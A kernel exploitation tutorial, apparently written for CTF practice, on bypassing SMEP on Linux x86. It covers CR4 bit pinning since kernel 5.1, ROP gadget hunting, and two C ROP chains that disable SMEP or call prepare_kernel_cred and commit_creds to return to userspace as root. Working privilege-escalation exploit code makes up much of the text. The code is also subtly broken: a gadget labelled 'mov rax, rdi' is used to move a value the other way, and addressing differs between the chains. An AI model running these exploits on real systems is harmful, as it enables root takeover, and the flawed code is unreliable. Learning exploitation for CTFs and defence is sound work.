Supervisor mode execution protection (SMEP)

Supervisor mode execution protection (SMEP) is a hardware mitigation that prevents ret2usr exploits from working: while running in kernel mode (ring 0), the CPU cannot execute code from pages that belong to userspace. It is a feature offered by Intel chips, controlled by bit 20 of the CR4 register, and the Linux kernel turns it on when the CPU supports it. The same mitigation exists on ARM devices, where it is called PXN. (Also see this article for Android.)

We can check for SMEP through /proc/cpuinfo:

# cat /proc/cpuinfo | grep smep
flags		: fpu de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx lm constant_tsc nopl xtopology cpuid pni cx16 hypervisor smep smap
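
The same check can be done from C, for example at the start of an exploit that wants to pick a strategy. The following is a minimal sketch, not part of the original write-up: the helper names `cpu_flags_contain` and `cpuinfo_has_flag` are hypothetical, and it assumes the flags line looks like the output above.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Returns true when `flag` appears as a whole whitespace-delimited token
 * in `flags_line` (so "smep" does not match inside a longer word). */
bool cpu_flags_contain(const char *flags_line, const char *flag)
{
    size_t len = strlen(flag);
    const char *p = flags_line;

    if (len == 0)
        return false;

    while ((p = strstr(p, flag)) != NULL) {
        bool starts_token = (p == flags_line) || p[-1] == ' ' || p[-1] == '\t';
        bool ends_token = p[len] == '\0' || p[len] == ' ' ||
                          p[len] == '\t' || p[len] == '\n';
        if (starts_token && ends_token)
            return true;
        p += len;
    }
    return false;
}

/* Scans a cpuinfo-style file (normally /proc/cpuinfo) for a "flags" line
 * containing `flag`. Returns false if the file cannot be opened. */
bool cpuinfo_has_flag(const char *path, const char *flag)
{
    char line[8192];
    bool found = false;
    FILE *f = fopen(path, "r");

    if (f == NULL)
        return false;

    while (!found && fgets(line, sizeof(line), f) != NULL) {
        if (strncmp(line, "flags", 5) == 0)
            found = cpu_flags_contain(line, flag);
    }
    fclose(f);
    return found;
}
```

Calling `cpuinfo_has_flag("/proc/cpuinfo", "smep")` would then tell us whether the CPU advertises SMEP.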

Before Linux Kernel 5.1

One technique, described in a Google Project Zero post, is to clear bit 20 of the CR4 register. To do this, Andrey Konovalov used a func(data) primitive to call native_write_cr4(val) with bits 20 and 21 of val (SMEP and SMAP) set to 0.
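
To make the bit arithmetic concrete, here is a small sketch of how such a value could be derived from a known CR4 value. The helper name `cr4_without_smep_smap` and the starting value `0x3407f0` are assumptions chosen for illustration; a real exploit would start from the CR4 value of the target machine (for example, from a crash dump).

```c
/* Bit positions in CR4 on x86: SMEP is bit 20, SMAP is bit 21. */
#define CR4_SMEP_BIT 20
#define CR4_SMAP_BIT 21

/* Hypothetical helper: returns `cr4` with the SMEP and SMAP bits cleared
 * and every other bit left untouched. */
unsigned long cr4_without_smep_smap(unsigned long cr4)
{
    unsigned long mask = (1UL << CR4_SMEP_BIT) | (1UL << CR4_SMAP_BIT);

    return cr4 & ~mask;
}
```

With the illustrative input `0x3407f0`, the result is `0x407f0`: only bits 20 and 21 change.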

The kernel source shows that the function accepts an arbitrary value and attempts to set the CR4 register to it. However, we can see that the function also mentions some bit pinning!

void native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}

It turns out that the kernel ensures those bits are not changed after the CPU has finished initializing. Just a couple of lines above this function, it specifies which bits those are:

/* These bits should not change their value after CPU init is finished. */
static const unsigned long cr4_pinned_mask =
	X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;
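
The effect of the pinning check can be modelled in userspace. This is only a sketch of the correction step in the function above, under the assumption that pinning is active; `model_pinned_cr4_write` is a hypothetical name, and the real function writes the register before and after correcting the value.

```c
/* Userspace model of the pinning logic: returns the value CR4 would end up
 * holding after a write of `val`, given the pinned mask and the pinned bit
 * values that were recorded at the end of CPU init. */
unsigned long model_pinned_cr4_write(unsigned long val,
                                     unsigned long pinned_mask,
                                     unsigned long pinned_bits)
{
    if ((val & pinned_mask) != pinned_bits) {
        /* Same correction as the kernel: keep the unpinned bits from the
         * caller and force the pinned bits back to their recorded values. */
        val = (val & ~pinned_mask) | pinned_bits;
    }
    return val;
}
```

If SMEP and SMAP were both on at init, a write of `0x6f0` ends up as `0x3006f0`, so both bits are set again.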

These changes were introduced in Linux Kernel 5.1 and prevent us from overwriting those bits using this function. For exploits against kernels before 5.1 (for CTFs) we can still use this technique, and we need to execute a two-gadget ROP chain to call this function.

We need the address of native_write_cr4 and a gadget to fill our RDI register, as it will contain the argument the function expects. Using ROPgadget we can find a gadget, and using either our leak from before or a read of /proc/kallsyms, we can get the address of native_write_cr4.
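
Reading the address from /proc/kallsyms can be scripted. Below is a minimal sketch, assuming the usual `<hex address> <type> <name>` line format; the function names are hypothetical. Note that when kernel pointers are hidden from the current user, the addresses read back as zero, so a zero result should be treated as "not available".

```c
#include <stdio.h>
#include <string.h>

/* Parses one kallsyms-style line. Returns 1 and stores the address in
 * *addr_out when the symbol name matches exactly, otherwise returns 0. */
int kallsyms_line_lookup(const char *line, const char *symbol,
                         unsigned long *addr_out)
{
    unsigned long addr;
    char type;
    char name[256];

    if (sscanf(line, "%lx %c %255s", &addr, &type, name) != 3)
        return 0;
    if (strcmp(name, symbol) != 0)
        return 0;

    *addr_out = addr;
    return 1;
}

/* Scans a kallsyms-style file (normally /proc/kallsyms) for `symbol`.
 * Returns 1 on success, 0 if the file is unreadable or the symbol is absent. */
int kallsyms_lookup(const char *path, const char *symbol,
                    unsigned long *addr_out)
{
    char line[512];
    int found = 0;
    FILE *f = fopen(path, "r");

    if (f == NULL)
        return 0;

    while (!found && fgets(line, sizeof(line), f) != NULL)
        found = kallsyms_line_lookup(line, symbol, addr_out);

    fclose(f);
    return found;
}
```

Subtracting the symbol's offset inside vmlinux from the address found this way gives the kernel base that the ROP chain adds to each gadget offset.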

A quick note here on finding ROP gadgets for kernels. Make sure you're not running ROPgadget on the bzImage, since that's the entire compressed boot image that wraps the vmlinux kernel image. There is an extract-vmlinux script inside the kernel tree that extracts the vmlinux kernel, which is what we want to search for gadgets.

$ ./linux-5.4/scripts/extract-vmlinux linux-5.4/arch/x86/boot/bzImage > vmlinux
$ ROPgadget --binary vmlinux > kernel_gadgets
$ cat kernel_gadgets| grep ': pop rdi ; ret'
0x000000000003be1d : pop rdi ; ret
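
The address printed by ROPgadget here is an offset, so it has to be rebased before it goes into the chain. The following sketch shows that step; both helper names are hypothetical, and the base `0xffffffff81000000` used in the usage note is an assumption that only holds when the kernel is not relocated by KASLR.

```c
#include <stdlib.h>

/* Parses the leading hexadecimal address of a ROPgadget output line such as
 * "0x000000000003be1d : pop rdi ; ret". strtoul stops at the first
 * character that is not part of the number. */
unsigned long gadget_offset_from_line(const char *line)
{
    return strtoul(line, NULL, 16);
}

/* Turns an offset inside the kernel image into a runtime address. */
unsigned long rebase_gadget(unsigned long kernel_base, unsigned long offset)
{
    return kernel_base + offset;
}
```

With a base of `0xffffffff81000000`, the `pop rdi ; ret` gadget above ends up at `0xffffffff8103be1d`.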

Using these pieces we can construct a small ROP chain that ends with a jump into our give_me_root function:

unsigned long pop_rdi_ret = 0x3be1d;
unsigned long native_write_cr4_offset = 0x2ddf0;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL; //[BUF_SIZE];
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = kernel_base + pop_rdi_ret;
  buf[cookie_offset + 3] = 0x6f0; // or 0x407f0; popped into rdi as the new CR4 value
  /*
   * Both values leave bit 20 (SMEP) and bit 21 (SMAP) cleared:
   * 0x407f0 -> 0b1000000011111110000
   * 0x6f0 -> 0b11011110000
   */
  buf[cookie_offset + 4] = kernel_base + native_write_cr4_offset;
  // Once SMEP is off, we can return to userspace pages again!
  buf[cookie_offset + 5] = (unsigned long)give_me_root;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}

If SMEP bit is pinned

If the SMEP bit is pinned, we can't overwrite that part of the CR4 register with our own value, so we need to ROP our way through the prepare_kernel_cred and commit_creds calls instead. The steps we need to take are straightforward. We need to implement the following pseudo-assembly as ROP calls:

mov rdi, 0
call prepare_kernel_cred
mov rdi, rax
call commit_creds
swapgs
iretq

Running the previous ret2usr payload with SMEP enabled results in a kernel panic.

Generating the ROP chain for a given kernel is pretty straightforward, and you shouldn't run into any road bumps. My code for the overflow is shown below:

// 0xffffffff8103be1d : pop rdi ; ret
unsigned long pop_rdi_ret = 0xffffffff8103be1d;
// 0xffffffff81033b50 : mov rax, rdi ; ret
unsigned long mov_rax_rdi = 0xffffffff81033b50;
// 0xffffffff81c00eaa : swapgs ; popfq ; ret
unsigned long swapgs_popfq_ret = 0xffffffff81c00eaa;
// 0xffffffff810240c2 : iretq (bytes 48 cf)
unsigned long iretq = 0xffffffff810240c2;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL; //[BUF_SIZE];
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  user_rip = (unsigned long)drop_shell;

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = pop_rdi_ret;
  buf[cookie_offset + 3] = 0 ; // Argument for prepare_kernel_cred
  buf[cookie_offset + 4] = prepare_kernel_cred;
  buf[cookie_offset + 5] = mov_rax_rdi; // move cred struct to argument
  buf[cookie_offset + 6] = commit_creds;
  buf[cookie_offset + 7] = swapgs_popfq_ret;
  buf[cookie_offset + 8] = 0xDEADBEEF; // value for popfq
  buf[cookie_offset + 9] = iretq; // swap from kernel to userspace
  buf[cookie_offset + 10] = user_rip; // <-- here is drop shell function
  buf[cookie_offset + 11] = user_cs;
  buf[cookie_offset + 12] = user_rflags;
  buf[cookie_offset + 13] = user_sp;
  buf[cookie_offset + 14] = user_ss;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}
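
The last five slots of the chain are the frame that iretq pops when it returns to userspace, and their order matters. The sketch below spells out that layout; the struct and helper names are hypothetical, and the values in the usage note are placeholders, not the saved state from this exploit.

```c
#include <stddef.h>

/* The five values iretq pops in 64-bit mode, lowest stack address first. */
struct iretq_frame {
    unsigned long rip;    /* where userspace execution resumes */
    unsigned long cs;     /* user code segment selector */
    unsigned long rflags; /* flags to restore */
    unsigned long rsp;    /* user stack pointer */
    unsigned long ss;     /* user stack segment selector */
};

/* Writes `frame` into `chain` starting at slot `index` and returns the index
 * of the next free slot. The caller must make sure the chain has room for
 * five more entries. */
size_t push_iretq_frame(unsigned long *chain, size_t index,
                        const struct iretq_frame *frame)
{
    chain[index++] = frame->rip;
    chain[index++] = frame->cs;
    chain[index++] = frame->rflags;
    chain[index++] = frame->rsp;
    chain[index++] = frame->ss;
    return index;
}
```

In the chain above this corresponds to slots `cookie_offset + 10` through `cookie_offset + 14`, filled from user_rip, user_cs, user_rflags, user_sp and user_ss.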

Success!

